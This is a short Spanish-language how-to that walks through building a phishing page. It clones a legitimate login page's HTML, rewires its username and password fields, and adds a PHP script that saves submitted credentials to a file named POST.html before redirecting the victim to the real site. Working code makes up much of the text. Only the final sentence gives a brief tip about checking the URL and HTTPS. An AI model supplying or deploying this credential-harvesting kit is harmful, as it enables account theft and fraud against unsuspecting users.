Pescando

Phishing es una de las tecnicas usadas en la red para falsificar una pagina autentica para robar informacion confidencial de una o mas personas. Esto se lleva acabo mediante cierta persona que va a la pagina legitima, copia el codigo fuente de esta presionando la combinacion de teclas Ctrl+U y copiando el codigo fuente aun nuevo archivo de extension .html. Luego cambiando en el codigo fuente para nombre de usuario:

<p><label for="username">Email:</label>
<input name="username" type="text" id="username" size="20" /></p>

y para contraseña:

<p><label for="password">Password:</label>
<input name="password" id="password" size="20" type="password"></p>
Luego se crea un archivo .php con la siguiente informacion:




<?php
$name = $_POST["username"];
$pass = $_POST["password"];
$fl = fopen('POST.html', 'a');
fwrite($fl, "" .$name. ":" .$pass. "<BR><BR>");
fclose($fl);
header( 'Location: http://www.pagina a redirigir.com' ) ;
?>

En donde pagina a redirigir seria la pagina a la que despues de que el usuario a introducido su contraseña en el portal falso lo redirigira al portal en la red autentico. Guardamos el archivo con el nombre: archivo.php Despues de haber creado y editado los dos archivos vamos al archivo .html y escribimos el nombre que le dimos al archivo .php:

<form action="archivo.php" method="post">

Donde archivo.php es el archivo .php donde se llevara el nombre de usuario y la contraseña a POST.html.

Este es basicamente el modo en el que se crea una pagina para "pescar" a la gente. Para salvarnos de una de ellas siempre verifiquemos el URL y si la conexion esta siendo llevada acabo por SSL o https.